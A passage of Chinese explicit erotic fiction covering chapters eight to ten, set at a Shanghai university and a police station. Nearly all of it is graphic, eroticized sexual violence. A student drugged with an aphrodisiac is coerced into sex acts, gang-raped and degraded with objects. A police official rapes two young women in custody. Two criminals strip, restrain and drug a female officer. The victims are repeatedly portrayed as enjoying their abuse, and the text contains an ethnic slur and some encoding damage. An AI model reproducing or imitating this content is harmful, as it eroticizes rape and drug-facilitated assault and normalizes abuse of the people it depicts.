      “那……那這樣吧,”傻胖子突然靈機一動,道︰“那你替我吸出來?!?br>
      陳卓聽到這里恨不得出去揍死傻胖子,他竟然想要那樣高貴圣潔的少女替他口交!這簡直是太心了!可是他沒有勇氣沖出去,他只是貪婪地看著梁婉儀裸露的美腿。

      “不會的,”陳卓對自己說︰“梁婉儀才不會答應呢,她怎么會用她高貴的嘴去舔傻胖子骯臟的陰莖呢?不會的!”

      “什么吸出來?”梁婉儀不解地問。

      “就是用你的小嘴含著我那東西……”傻胖子解釋。

      “不行啦,羞死人了!”梁婉儀嬌叱。

      “那我生氣了!”傻胖子裝作生氣道。

      “別生氣啦,我讓你摸我,好不好?”平素高傲無比的梁婉儀立刻低聲下氣地求傻胖子。

      “不行!”傻胖子堅決地說。

      “讓我做那事,太……太難為情了,胖哥哥,我是毫無保留地愛你的,求你給我留點尊嚴吧!我讓你摸我,好不好嘛!”梁婉儀一邊哀求,一邊解開了自己的衣服,里面是一件緊身的內衣。梁婉儀將自己的內衣撩起,露出白色的花邊胸罩。梁婉儀將雙手優雅地伸到背后,解開了胸罩的扣子,一對潔白高聳的乳房立刻裸露了出來。兩顆粉紅色的乳頭是那樣嬌嫩,顯然沒有怎么被人撫弄過。

      天??!曾經是那樣高傲、不可侵犯的梁婉儀,竟然主動裸露出自己的胸部求別人撫摸!傻胖子當然口水直流,他伸出肥大的手,一手一個握住了梁婉儀的乳房,粗暴地摸弄。

      陳卓看得又是憤怒,又是欲火中燒。憤怒的是傻胖子是那么輕蔑和下流地玩弄著梁婉儀的乳房,他不僅粗暴地亂摸,甚至淫笑著捏住梁婉儀兩顆柔嫩的乳頭向外亂拉,可憐梁婉儀形狀如桃實般美麗的乳房被拉得成了尖尖的圓錐。

      傻胖子肆意地玩弄了一會兒后說道︰“婉儀妹妹,還是不行,我越來越興奮了!你還是替我吸出來吧!”其實婉儀赤著下身和乳房任由他摸弄已經很令傻胖子滿足,但是他還是想看看高傲的梁婉儀究竟肯任他污辱到什么地步。

      “婉儀,別答應他??!”陳卓心里呼喚。

      “那……那好吧!”梁婉儀終于羞澀地說。陳卓頓時痛苦欲死。

      而傻胖子見梁婉儀真的答應,簡直不敢相信自己的耳朵。其實他提出這個要求時沒指望如此高傲的梁婉儀真的會答應。春藥真是太神奇了!天??!想一想!梁婉儀替我口交??!這太幸福了!恐怕我是她口交的第一個男人吧?嘿嘿,阿流第一個插了她的小洞,我可以第一個插她的小嘴!

      想到此處,傻胖子迫不及待地脫下褲子,露出布滿了肥肉的便便大腹,兩條長滿了粗黑腿毛的肥短腿和一根肥大、早已經漲得紫硬的肉棒。肉棒周圍是茂盛的濃黑的雜亂的陰毛,丑陋的龜頭上明顯沾著殘余的尿水,周圍包皮縮入去的地方滿是包皮垢!散發著一股幾乎陳卓都能聞到的惡臭。

      “來吧,婉儀妹妹!”傻胖子興奮地站在那里,等著成為梁婉儀第一個口交的男生這一“偉大”時刻的到來。

      在陳卓心痛的注視下,美麗高傲的梁婉儀羞澀而優雅地理一理自己紛亂的秀發,彎起修長赤裸的美腿,跪倒在了傻胖子的面前,美麗的面孔正對著傻胖子那翹起的巨棒。

      梁婉儀略一猶豫,不知是她高傲的本性和理智同烈性春藥做了最后的掙扎,還是傻胖子骯臟而惡臭的肉棒令冰清玉潔的她感到一陣心,然后她湊過去,張開櫻桃小嘴,含住了傻胖子骯臟的肉棒。是的,她含住了那根肉棒,用她的嘴,用那張所有男生都幻想能夠吻上一吻的小嘴,可是此刻卻含住了一個丑陋的胖子的性器。

      “不!”陳卓心里發出了絕望的吶喊。

      傻胖子只感到一陣溫熱包圍了自己的性器官,一股強烈的生理快感和心理的滿足感沖上了心頭!梁婉儀替我口交了!他恨不得到大操場上去喊︰梁婉儀替我口交了??!

      “啊……啊……”傻胖子滿足地呻吟著︰“婉儀妹妹,這是不是你第一次含別人的肉棒???”

      跪在那里,嘴里滿滿地塞著肉棒的梁婉儀輕輕點了點頭。

      “你要……啊……用舌頭舔……啊……對……就是這樣……還要吞吐我的肉棒,就像我的肉棒在你的小洞里插進拔出一樣……啊……啊……對對……就這樣……對對……啊……啊……”

      在傻胖子的指導下,梁婉儀用小舌頭舔著傻胖子的龜頭,還賣力地吞吐著他的肉棒。

      陳卓心如刀絞地看著這一切,心目中的女神跪在一個胖子的腳下,賣力地吞吐他的生殖器,長發隨著頭的晃動而微微飄動,撩撫在傻胖子肥大的肚子上,胸前裸露的兩個乳房隨著她身體的搖動而微微抖動。吞吐了一會兒肉棒之后,又在傻胖子的指導下去舔他的兩顆肉丸,然后再含住他的肉棒,傻胖子則滿臉幸福地呻吟著、呻吟著……

      “啊,婉儀妹妹,你太調皮了,再吮得重些……啊……婉儀妹妹……你好可愛……我要搞你……”傻胖子一邊享受,一邊也俯下身,用兩手去逗弄梁婉儀的乳頭,將她兩顆乳頭扯來扯去。

      可憐的梁婉儀畢竟是個少女,何況還是在春藥的控制下。她也逐漸產生了快感,竟然也慢慢可是發出嬌滴滴的呻吟。她嬌美的呻吟同傻胖子肆無忌憚的爽叫融合成極不和諧的音律,回蕩在男生寢室的盥洗室里。

      在這個盥洗室里,曾經記錄了無數男生對梁婉儀的談論、評價、贊嘆,渴求或者是性幻想,而今天,這個盥洗室迎來了她本人,并且記錄下了她裸露的兩條玉腿,她高聳豐滿的玉乳,她撩人魂魄的嬌喘呻吟,還有她這輩子第一次替人口交的景像……

      兩人的呻吟終于達到高潮,只聽傻胖子極爽地大喝一聲,將一股渾濁的精液統統噴進梁婉儀的小嘴里。梁婉儀在他的要求下全部喝下,然后舔干凈傻胖子的肉棒。

      “這下滿足了吧!”梁婉儀帶上胸罩,拉起褲子后,嗔怪地瞪了一眼在拉褲子的傻胖子說。這本來是多么撩人俏皮的一幕??!如果是一對俊男靚女的話,可是……

      就在這時,走廊里響起了腳步聲。梁婉儀驚慌不已,卻又沒地方躲。兩個人出現在盥洗室門口,正是阿流和宋狗,傻胖子和梁婉儀都松了一口氣。

      “嘿嘿,你們兩個倒開心,讓我們參加一個怎么樣?”阿流道。

      “婉儀妹妹,你太過份了,怎么同這個傻胖子好,不同我好?”宋狗妒忌地說。

      “是他,逼我嘛!”梁婉儀嬌羞地說。

      “嘿嘿,婉儀妹妹可好了,剛剛給我吹過蕭呢!”傻胖子得意地說。

      “哎呀,羞死人了,別說嘛!”梁婉儀滿臉通紅。

      “什么?我也要,我也要!”宋狗和阿流爭著說。

      “既然這樣,我們就趁這個難得的機會,同婉儀妹妹好好地親熱親熱吧!”傻胖子說著抱起梁婉儀,往寢室走去,宋狗和阿流跟了進去。隨著梁婉儀的一聲嬌叫,門被“乒”地關上了。陳卓又跟到寢室門口偷看。

      只見三個流氓一起將梁婉儀剛剛穿好的牛仔褲和衣服、胸罩統統剝去,梁婉儀頃刻之間便赤身裸體地站在了三人中間。梁婉儀羞澀地用手掩住胸部和下身,剛才的口交和被傻胖子摸弄乳頭,終于完全激發了春藥的效力,梁婉儀已經完全迷失了自己!

      “你們不要……這樣三個一起搞嘛,人家……人家……羞死了!”梁婉儀嬌媚地嬌嗔。

      三個淫棍哪里會顧這些,扯開梁婉儀遮掩的玉藕般的手臂。傻胖子伸出兩只肥手去擰梁婉儀的乳頭,阿流則吻上了婉儀的芳唇,宋狗則毫無客氣地摸婉儀的陰戶。

      “你們三個不要啦!”婉儀用力推開他們,嬌媚地說。

      “人家……人家是喜歡你們……可是人家也是個羞澀的女兒家呀!你們三個一起這么搞我,人家受不了嘛!你們不要以為我喜歡你們,就對我為所欲為,人家……人家要不睬你們了!”

      梁婉儀這話分明是撒嬌,不過阿流還是停下說︰“那婉儀妹妹,你想我們怎么搞你???”阿流覺得還是這樣比較有情趣。

      梁婉儀羞澀地轉過臉,輕聲說︰“你們脫光衣服,乖乖地站好,我……一個一個地伺候你們?!?br>
      梁婉儀說這話時嬌羞無限,令三人神魂顛倒,連聲同意。

      三個惡棍立刻將自己也脫光,挺著雞巴說︰“我先,我先!”

      梁婉儀想了想,說︰“我在你們中間跳個舞,跳到誰面前就伺候誰吧!”

      三人一聽一代美女梁婉儀肯裸體跳舞,當然同意。

      只見梁婉儀便赤身裸體地轉圈跳舞,一邊唱道︰“我是一個懷春的少女,愛上了校園里的三個美少年,我為他們朝思夜又想,我為他們小穴濕了又濕?!绷和駜x唱完正好聽在阿流旁邊。

      “阿流哥哥,你要我怎么伺候你???”梁婉儀嬌媚地說。

      阿流沒想到梁婉儀竟能唱出這么淫蕩的歌曲,興奮得想嚎,他道︰“婉儀妹妹,我要你屁眼里插根火腿腸替我口交!”

      梁婉儀嗔怪地瞪了阿流一眼︰“你們男生啊,就知道欺負我們女生,為什么老是打我那個骯臟的地方的主意嘛!”

      “因為婉儀妹妹那里長得太漂亮了!”阿流說。

      梁婉儀咯咯地笑了︰“什么嘛,那里男生女生不是都一樣嘛!”

      阿流聽到這里,眼珠一轉道︰“婉儀妹妹,不一樣的,你們女孩的屁眼又香又美,我們男生的屁眼都臭臭的,婉儀妹妹,你肯不肯替我把屁眼舔干凈???”

      陳卓在門外幾乎昏倒。

      “你們男生啊,就是不衛生?!绷和駜x嬌柔道。

      “那婉儀妹妹你肯不肯?”阿流問。

      “怎么會不肯呢!你是我的……第一個男人,”梁婉儀滿臉柔情地說︰“只要你珍惜我、疼我,我什么都肯為你做!”

      阿流樂得差點昏倒,而陳卓卻咬牙切齒。

      阿流立刻躺到床上,掰開腿。梁婉儀走到床邊,跪下,伸出嫩白的玉手,扒開阿流的屁股,然后將臉湊近他的屁股。她伸出小舌頭,舔起了阿流的屁眼。

      “真的很臟呢!”婉儀認真地舔舐,阿流則爽得大叫。

      婉儀認真地舔了五、六分鐘,在宋狗和傻胖子急切地反對下停止。

      “該我了,該我了!”兩人都叫。

      “我剛才給胖哥哥口交過了,下面讓我伺候宋狗哥哥吧!”

      宋狗大喜,道︰“婉儀妹妹,阿流第一個搞你的陰道,傻胖子第一個搞你的嘴巴,我要第一個搞你的屁眼?!?br>
      “又要搞人家這里,壞死了啦!”婉儀嬌嗔。她看了一眼宋狗紫漲的陽具,道︰“那么大,怎么塞得進去嘛!”

      “塞得進,塞得進!”宋狗連說。

      “我們可以幫忙!”傻胖子說。

      羞澀的婉儀猶豫了一番,終于點頭答應。她在他們的指導下,趴在地上,高高翹起她的豐臀,傻胖子和阿流狠狠扒開她的兩片屁股,阿流吐了兩口唾沫在婉儀美麗的菊花蕾上,然后便用他的雞巴狠命插入。梁婉儀窄緊的肛門雖然被筆插過,卻怎容得下宋狗粗大的雞巴!立刻痛得直哭,可是三人卻興奮異常。

      十分鐘后,梁婉儀的直腸里第一次留下了男人的精液。

      被干了屁眼的梁婉儀終于筋疲力盡,可是三個淫棍卻不放過她。他們接著對她進行了輪奸,梁婉儀被他們輪流用各種想得出的姿勢奸污。再后來,他們的獸欲基本已經滿足,開始對梁婉儀進行玩樂。他們將梁婉儀用各種姿勢綁起來,然后在她的陰道里塞火腿腸,在她的肛門里塞牙刷,把牙膏、餅干、啤酒、電池等東西塞入,倒入她的陰道和屁眼里,用衣架上的架子夾住她的乳頭。再后來,他們讓梁婉儀叼著他們的雞巴在寢室里赤裸地像母狗一樣爬來爬去,他們讓梁婉儀掰開兩腿躺在床上,用手撐開自己的肉縫,他們比賽誰能把花生米丟進去……

      兩小時后,三個流氓終于筋疲力盡。梁婉儀羞澀地穿好衣褲,說︰“哥哥們玩得開不開心???”

      “開心,開心,婉儀妹妹,你太好了!”三人連連說。

      “那我明天再陪你們玩吧!”梁婉儀說完走了出去,陳卓又躲入廁所。他看見梁婉儀走出去的時候,兩條長腿幾乎合不攏了!

      陳卓打開一個水龍頭,將自己的頭塞進去,冰涼的水沖著他的頭。

      五分鐘后,陳卓終于下定決心。他走進寢室。

      阿流他們正躺在床上回味,看見一臉殺氣的陳卓,立刻坐了起來。

      “喲,干什么?好像要殺人似的?!卑⒘鬏p蔑地說。

      “就是,像個落湯雞,洗頭沒帶毛巾??!”宋狗說。

      “請你們……”陳卓強忍怒火,輕輕說︰“請你們不要……這么羞辱她?!?br>
      “什么?你說誰???”阿流假裝聽不懂。

      “是梁婉儀,請你們……不要那樣羞辱婉儀?!标愖空f。

      “我們怎么羞辱她了嘛,都是她意的,對不對?”傻胖子說。

      “她,她是自的,可是你們已經可以隨時享受她的身體了,請你們,我求你們不要那么羞辱她。她是那么高傲的女孩,等藥性過去,她回憶起來,會……會受不了的?!标愖坑脦缀醢蟮恼Z氣說。

      “我們哪有羞辱她?”宋狗說。

      “你們……把她綁成那么羞恥的姿勢,還……還把東西塞進她……那里,還……還……讓她舔你們的肛門……求你們不要……”

      “喲,那這跟你有什么關系???”阿流笑說。

      “因為……因為……我喜歡婉儀!”陳卓終于說。

      這正是三個流氓想聽到的。

      “哎喲!真對不起呀,我們不知道?!?br>
      “是呀,知道的話,我就不讓你的心上人替我舔雞巴了!”

      “就是,早說嘛,我就不把火腿腸塞進她的屁眼里了!”

      “哈哈哈哈,哈哈哈哈!”

      三個流氓的笑聲回蕩在寢室里。

      這時只聽門口“當”一聲,然后是一陣腳步聲。四人都沖出去看,梁婉儀靚麗的背景在轉角一閃,消失了。陳卓飛奔而出。

      原來,那種春藥的所謂“藥力保留”主要不是看時間,而是看性交的次數。這個下午,梁婉儀被奸淫的次數差不多抵上正常的三天。她剛才回來拿她忘記的書,在門外聽到一切,猛然醒覺了。

      梁婉儀奔入學校西面的樹林,陳卓沖上去拉住她。

      “別管我,讓我死吧,別管我!”梁婉儀哭喊著。

      “婉儀,不要去死!忘掉痛苦,勇敢地生活下去!”陳卓說。

      “不,我還有什么必要活下去??!”梁婉儀淚流滿面。

      “婉儀,我愛你!”陳卓激動地說︰“不論怎樣我都愛你!”

      “不,陳卓,我是被人糟蹋得不成樣子的女孩了,我根本配不上你!”

      “婉儀,別這樣說,在我心中,你永遠純潔!”

      “不!不!”梁婉儀拚命搖頭。

      “婉儀,你不接受我,你也要為你父親想想,你付出了這么多代價,為了什么?”

      陳卓此話一出,梁婉儀終于冷靜下來。

      “答應我,好好活下去!”陳卓說。

      梁婉儀點點頭。

      “我會同江龍一直斗下去的,我一定會讓他得到應有的下場!”陳卓堅定地說。

      第九回 警局里的黑天暗日

      上海某警察局的一間寬敞的辦公室里。

      “嘿嘿,你小子還真說話算話?!毙虃煽频纳蚩崎L淫笑著對江龍說。

      “這個自然,逮捕梁益民還多虧了沈科長的大力幫忙嘛!”江龍笑道︰“好了,我就不耽誤沈科長的好事了。請沈科長好好享用吧!”江龍說完,便起身告辭。

      沈科長將江龍送走后,便逕自走到“等候室”的門口?!暗群蚴摇崩镒粋€修長嬌美的女孩。女孩穿著一套漂亮的連衣短裙和肉色的長絲襪,腳上穿著精美的高跟涼鞋。女孩正是梁婉儀,沈科長忍不住吞了一口唾沫。

      “請梁小姐跟我來吧?!彼麤_梁婉儀說道。

      梁婉儀急忙起身,跟著沈科長。她多么想立刻看到她的父親獲得自由??!

      “沈科長,我父親的身體怎么樣?”她問。

      “嗯,還可以,回家后好好調理調理吧?!鄙蚩崎L領著梁婉儀走進他的辦公室。梁婉儀進來后,他偷偷地將門鎖住。他的這間辦公室有良好的隔音設備,一旦門關上,里面就是有炸彈爆炸,外面也聽不見的。

      “梁小姐,請你在一些文件上簽字?!鄙蚩崎L一邊裝模作樣地說,一邊打量著眼前的美女。自從三年前他第一次看到梁婉儀十八歲拍的廣告后,就一直以梁婉儀作為手淫的對象。如今這個讓他魂牽夢繞的青春少女竟然就站在他的面前。這和他那中年肥胖的老婆和風月場上那些半老徐娘有著怎樣的反差??!嘿嘿!活到五十三歲,終于有機會玩一個這么美的少女。

      梁婉儀俯下身子,在文件上簽字,短裙遮蓋下的豐臀便翹了起來。沈科長哪里還忍得住,猛地從后面撲上去伸進梁婉儀的短裙里狂摸她渾圓的屁股。

      梁婉儀正在簽字,怎么會料到有這樣的事,猝不及防,竟立刻被沈科長將內褲剝到了膝蓋。她本能地夾緊兩腿,卻發現一只有力的手已經伸在她的胯間,手指插進了她的陰道。

      “啊,沈科長!”梁婉儀驚叫起來,她知道遇上了色狼︰“放開我,你這個畜生!??!”

      纖弱的梁婉儀在沈科長手里就像是一只小羊羔。在梁婉儀無力的捶打中,沈科長將梁婉儀按倒在辦公室的地上,將她的連衣短裙脫去,然后扯去她的胸罩和內褲。這樣梁婉儀全身便只剩下了肉色的長絲襪裹住她修長的玉腿。在梁婉儀拍的廣告里她也是穿著肉色的絲襪。

      “畜生,不要!”梁婉儀拚命扭動嬌軀和長腿,沈科長看見長年渴求的美少女的裸體,頓時欲火中燒,捉住她的纖纖小手,然后用嘴去舔婉儀的乳頭。婉儀哭喊著掙扎,卻無濟于事。

      沈科長亂咬亂舔了一番梁婉儀的乳頭后,拿出幾副手銬,將梁婉儀的雙手分開銬在辦公桌的兩只腳上,又將梁婉儀的兩條絲襪美腿扒開成幾乎120度,高高銬在辦公桌兩邊的兩只大文件柜的把手上。這樣,梁婉儀便完全喪失了掙扎的能力,腿間的羞處也毫無保留地呈給了這個五十三歲的色狼。

      天??!這辦公室應該是為人民服務,偵察破案的地方??!這手銬也是用來鎖住犯罪份子罪惡的雙手的,而此刻卻成為了一個老色狼玩弄,蹂躪一個美少女的工具。

      “嘿嘿嘿!”看著青春美少女被銬成這么羞恥的模樣,沈科長變態地笑了起來。

      “你,放開我!”梁婉儀淚流滿面,這些日子,她已經不是第一次裸體??墒窍襁@樣被人強行剝光,弄成這么羞恥的姿勢卻是頭一回。

      “放開我,聽到沒有!”梁婉儀嬌叱??墒腔卮鹚氖且恢贝謮训氖炙翢o忌憚地摸弄她的陰唇和陰蒂,是一張惡臭的嘴舔她的臉,她的唇,她的乳頭……最后是一根粗大的肉棒粗暴地捅入她依然很緊的少女的陰道……

      當沈科長喘息著,將他已經軟倒的陰莖拔出沾滿了他的精液的梁婉儀的陰道時,電話鈴響了起來。

      沈科長去聽,是北京來的女警官陳茹,她要求馬上提審兩個日本人。沈科長對這個厲害的女警有點怵,連忙連聲答應。

      放下電話,沈科長惡毒地對淚流滿面的梁婉儀道︰“你要是敢對別人說一個字,你就別想見到你活著的父親了!”說完松開了她。

      可憐的再度被羞辱的梁婉儀只得抽泣著穿好了內褲和衣裙……


      審訊一室里,英姿勃勃的女警官陳茹威嚴地站在日本人西村和小林面前。

      隔壁的審訊二室里,一個男孩和一個修長美麗的女孩正等在那里。他們正是李浩和肖揚。李浩握著肖揚的手安慰她︰“法律會主持正義的!”

      門開了,沈科長微笑著走了進來,李浩和肖揚站起身。

      “坐,坐吧!”沈科長故作和藹地說。他打量了肖揚一番,肖揚雖然只穿著簡單的牛仔褲和緊身上衣,可是嬌美的臉和修長的身材加上一個被強奸過的少女特有的幽怨的氣質,顯得無比令人心動。沈科長心說︰江龍這小子學校里的美女還真是多,剛讓我搞了一個,此刻又可以搞一個了。

      “沒關系,很高興你們相信法律,到這里來。你們放心吧,我們會主持正義的!”沈科長道貌岸然地說︰“現在我給你們分別錄口供,你先出去等吧?!鄙蚩崎L對李浩道。

      李浩哪里會知道這個沈科長是個禽獸,便走了出去,一個警察將他帶到“等候室”。

      李浩剛到等候室,便看見神情憔悴的梁婉儀向警局門口走去。

      “婉儀!”他叫住她︰“來看你父親?”

      梁婉儀微微點頭︰“你來做什么?”

      “我……我和肖揚來報案,我們決定了,任別人說閑話去,我不會嫌棄肖揚的,應該讓法律主持正義,讓江龍得到應有的下場?!崩詈普f。

      “那……肖揚她……在哪里?”

      “刑偵科的沈科長正在給她錄口供?!崩詈拼?。

      “什么?沈科長!不!”梁婉儀痛苦地驚叫。

      “怎么了,婉儀?”

      “快去!讓她出來,別讓她跟沈科長在一起!”

      “為什么?”

      “因為……因為……你別問這么多了?!绷和駜x漲紅了臉︰“總之快去救肖揚!”

      “到底怎么回事,什么叫救肖揚?”李浩不解。

      “那個沈科長不是好人!”

      “不會吧,他是公安人員??!”李浩還是不解。

      “唉,那個沈科長他……他……剛剛……剛剛強奸了我!”梁婉儀說完捂著臉沖出了警察局。

      “什么!”李浩大叫一聲沖向審訊室。

      “你們不交代,不會有好下場的,我勸你們還是同警方合作!”陳茹嚴厲地說。她邁動修長勻稱的腿在房間里走動。

      “你們沒證據,你們憑什么說我們綁架了那女孩?”西村道。

      “沒證據,你只能關押我們48小時?!毙×值?。

      陳茹憤怒地握著拳頭。

      “別生氣嘛,美麗的女警官,”西村道︰“我可以提供線索,不過有一個條件?!?br>
      “什么條件?”陳茹問。

      “就是陳警官你替我們每人口交三次!”西村說完便和小林一起哈哈大笑起來??墒撬麄冎粊淼眉靶α藘擅腌?,之后就是“哎喲哎喲”的慘叫聲,威風凜凜的陳茹狠狠地給他們每人兩個耳光。

      “陳警官,你打人!”西村嚎叫。

      “我要向你的上級告你!”小林道。

      “哼,你們這群喪盡天良的日本狗,走私了多少中國寶貴的文物,蹂躪了多少中國的少女,打死你們也活該!”陳茹氣憤地說。她滿臉通紅卻顯得更加嫵媚動人。比之肖揚、梁婉儀的嬌美,陳茹除了同樣苗條性感外,還多了一種健美。

      “嘿嘿,你說得不錯,可是你有證據嗎?你父親也死得冤??!”西村道。

      陳茹聽到此話,勃然大怒。這正是她的痛處,她不顧規定,沖上去又再狠狠地打小林和西村。這次她不打臉,因為打腫了會被看出來,她狠狠地揍他們的小腹。小林和西村帶著手銬,無法反抗,被打得嗷嗷直叫。

      “啊,陳警官,不敢啦!”

      “饒命啊,陳警官!”兩人哀號。

      就在這時,門上響起了急切的敲門聲。

      陳茹開門,看見一個青年站在門口,正是李浩。

      “警官,求求你,救救我女朋友,沈科長他……他正在隔壁污辱她!”李浩道。

      陳茹沉下臉︰“你不可以亂說,怎么會有這種事!”

      “真的,求你了!審訊室里只有他們兩個!”李浩說。

      陳茹知道沈科長確實是個好色的家伙,這從他看自己的目光就可以知道,可是他居然會利用公職做違法的事?不過由男警察單獨給女性錄口供確實是不符規定,本著一個警察的職業道德,陳茹道︰“好,我去看看,如果情況不屬實,我告你誹謗!”

      陳茹關上門,來到了審訊二室,她用鑰匙打開門,李浩立刻發出了痛苦的叫聲,而陳茹則簡直不敢相信自己的眼睛。一個女孩被赤裸裸地雙腿分開,雙手反在身后地銬在椅子上,而沈科長則蹲在女孩裸露的胯間,將一根警棍插入到女孩的肛門里!

      陳茹憤怒地大喝一聲,走過去一腳將沈科長踢倒在地︰“畜生,你不配做人民警察!”

      李浩撲過去抱住再次被污辱了的肖揚,他滿腔悲憤地將深深插入肖揚屁眼的警棍拔了出來。

      “我殺了你!”李浩拿著棍子就要去揍沈科長,被陳茹攔住。

      “把手銬鑰匙交出來!”

      沈科長灰溜溜地交出鑰匙,老奸巨滑的他正在思考對策。陳茹接過鑰匙給肖揚打開手銬,可憐的肖揚的手腕、腳踝、膝蓋都分別銬住,陳茹給她一一打開。此時她和李浩的注意力都集中在肖揚身上,卻全沒注意到沈科長已經悄悄溜了出去。

      陳茹打開了肖揚的六個手銬,將散落地上的衣褲遞給肖揚,肖揚淚流滿面地穿上。

      就在這時,陳茹聽到了背后的風聲,她抬起長腿漂亮地一個后踢,只聽“哎喲”一聲,一個人摔了出去。聽到這個聲音,陳茹立刻覺察不妙,她以為是負隅頑抗的沈科長來偷襲,所以并不在意,因為她自信可以輕松對付一個中年的沈科長??墒莿偛拍锹暋鞍选眳s并非沈科長的聲音,她敏銳的聽覺告訴她,那是小林的聲音!她心念電閃,一定是沈科長去放出了小林和西村,那么小林被踢倒,一定還有西村,說不定沈科長也一起撲來。她開始后悔自己太輕敵,如果當時自己轉過身,就可以看見西村的位置,可是自己為了瀟灑,現在背對著強敵。

      盡管如此,作為一名優秀的警官,她還是迅速地朝西村最可能出現的地方踢了一腳。又是“哎喲”一聲,可是陳茹已經知道不妙。因為她知道這一腳只踢中了一個人的肩膀,那個人完全還具有立刻進攻的能力。

      其實,在背對對手的情況下,能夠看都不看就踢中對方,已經了不起了,可是還沒做到“很”了不起。也就是這一點微小的差距,卻導致了這位漂亮女警終身的屈辱。在她踢中的同時,一根繩套套住了她的脖子,迅速緊緊地掐住了她。那是西村。

      “小心……??!”李浩剛剛叫出就被沈科長用警棍擊昏,他將肖揚拖到隔壁銬起來,將李浩則以“襲擊警察”的罪名叫人關了起來。

      審訊室里,爬起來的小林立刻踢向陳茹的小腹,陳茹飛起一腳踢向小林的下頜,本來這一腳必能后發先至,可是西村一拉繩索,陳茹被迫人向后仰,沒有踢中,反而被小林捉住了腳踝,這樣一來她便高高地分開了雙腿,小林看準機會狠狠地一腳踢在了陳茹的胯間。

      胯間可是人最脆弱的地方??!陳茹一聲慘叫,幾乎立刻喪失了戰斗力。西村一緊繩索將她拉翻在地,然后將繩索的另一端綁在暖氣管上,這樣陳茹的頭便被吊在墻根,無法動彈了。小林此時又狠狠朝陳茹的胯間和小腹一頓猛踢,來報復陳茹剛才對他們的毒打。陳茹被踢的連連慘叫。西村則將剛才用來銬肖揚的手銬將陳茹的雙手也銬在暖氣管上。

      這樣,這個美麗高傲的女警終于被她的犯人制服了!

      陳茹綿軟無力,精疲力竭地被拷在那里,眼睜睜地看著西村和小林兩個混蛋淫笑著向她走來。她抬起美麗的眼睛,憤怒卻又無奈地盯著他們。

      看到這個令他們又怕又怒又喜歡的中國美麗女警終于成了他們的階下囚,西村和小林自然都興奮得不得了。陳茹追蹤了他們近三年,令他們整日提心吊膽,可是此刻這個機靈,聰明的女警官已經完全成了他們的獵物。

      此刻被綁在暖氣管上的陳茹對于他們來說,與其是那個讓他們恐懼得難以入睡、干練機智的女警官,不如說是一個二十四歲、貌美如花、有著令人想入非非的漂亮身材的美女。是的,被制服了的她已經不是警察,她是一個和別的他們以前玩弄過的女人一樣的女人而已。

      “怎么樣,陳警官?”西村帶著勝利的得意望著毫無反抗余地的陳茹道。

      “你們一定不會逃脫法網的!”陳茹憤怒地說。

      “陳警官生氣的樣子真迷人??!”西村色迷迷地說。

      “你敢碰我!我殺了你!”陳茹雖然被俘,但說話依然充滿了震懾力。

      長期對陳茹的恐懼令西村幾乎顫抖了一下,但他很快告訴自己眼前的陳茹已經沒有任何抵抗力。

      “西村,此處不宜久留,快麻醉了她把她轉移到安全的地方吧?!毙×终f著拿出一個針筒,里面有黃色的液體。

      “急什么!外面有沈科長照應著?!蔽鞔宓扩U“難得可以和陳警官單獨這么相處,不好好纏綿一下怎么成?”

      小林當然也對陳茹垂涎欲滴,聽西村這么說,也大起了膽子。

      “畜生,你們敢碰我!”陳茹罵道,拚命掙扎,可是脖子上的繩索和鋼銬緊緊地鎖住了她。

      “喲,好威嚴??!看來是有必要讓陳警官知道一下,你已經不是那個高傲的追捕我們的女警官了,而是我們的女俘虜!是不是?”西村微笑地看著陳茹。

      “你敢碰我一下,我決不會放過你的!”陳茹又拚命扭動了一下身體。

      這時沈科長進來道︰“局長開會回來了,你們快一點?!?br>
      “西村,先麻醉了她吧,以后可以慢慢玩弄她!”小林道。

      “好吧,”西村說︰“那么打針應該打在哪里最好???”他說完淫笑著望著小林。小林會意,也淫笑著說︰“當然是打在有洞的地方嘍!”說完兩人狂笑。沈科長也在旁邊陪著干笑,猛然瞥見陳茹憤怒的目光,他自知慚愧,退了出去。

      “畜生,你們想干什么!”陳茹看著逼近她的西村和小林嬌叱著,可是兩個日本色狼卻依然淫笑著逼過去。陳茹奮力用腳踢他們,可是她無法行動,很快便被小林和西村一人將一條長腿捉住。

      被捉住了最后反抗的武器的陳茹只有絕望地叫罵著︰“放開我,你們想干什么!放開我!”陳茹發瘋般地用盡最后的力氣用力擺動她被捉住的長腿,扭動纖腰,秀美的長發隨著她的頭拚命的擺動而散亂,可是這位漂亮的女警官還是只能眼睜睜地看著兩個她的犯人將手伸向她的腰際。

      “畜生,放開我!放開我!”在女警官絕望的叫喊聲中,她的緊身長褲和白色的小內褲被西村和小林粗暴地剝去。

      天??!高傲的女警官終于在她追捕的罪犯面前露出了她下體的陰毛和豐滿白晰的屁股以及兩條白晰修長的玉腿!羞憤欲死的陳茹筋疲力盡地軟倒,淚水不爭氣地涌出了眼眶。再頑強,她終究是個女人??!

      “畜生!放開我!”她用哭泣的聲音依然喊著。

      “哇,原來這就是中國第一美女警官的玉臀??!果然也是與眾不同的美麗!怎么樣,露了屁股的女警官!”西村將頭湊到陳茹耳邊說︰“還高傲嗎?還想抓我們嗎?唉,要是你死去的父親知道他的寶貝女兒不僅沒為他報仇,還在他的仇人面前光屁股,不知會怎樣?哈哈哈哈!”

      生性要強、高傲的陳茹怎堪忍受被人扒下了褲子還要這樣羞辱,只想立刻死了。她扭過頭去,淚流滿面。

      “還挺倔強嘛!”西村笑道。

      “這是陳警官第幾次在自己的要犯面前露屁股???”小林笑問。兩人一邊用言語污辱陳茹,一邊伸手摸弄陳茹的陰毛和屁股。陳茹只能拚命夾緊她的長腿,不讓他們伸手到她的胯間。

      西村和小林都是玩女人的老手,他們相視一笑,早已經心領神會,兩人各捉住陳茹的一只腳踝,將她的玉腿用力分開,然后高高地將她的腳踝用手銬銬在暖氣管上面的部分。這樣陳茹便仰面朝天地呈120度趴開了她的兩腿,腿間那條從沒讓男人看過,更別說是自己的犯人的肉縫還有屁眼都無可奈何地張了開來。

      “畜生!”被弄成如此羞恥姿勢的陳茹終于崩潰︰“你們殺了我吧!畜生,你們殺了我吧,不要這樣羞辱我!求求你們殺了我吧!”

      望著高傲神情盡去,羞恥得淚流滿面,苦苦哀求的陳茹,西村滿意地笑了。他拿起針筒,伸到陳茹那條張開的粉紅色肉縫間……

      在藥性發作之前,這位美麗的女警官早已因羞憤而昏了過去……

      第十回 警察局里奸雙美一代警花遭狂辱

      上海第二大學旁邊的一幢高層公寓的21樓2101房間門口。

      一個男孩看看四周,拿出一樣撬鎖工具撬入了房間。這個男孩是陳卓,他是到江龍在學校附近租的房子里找線索的。

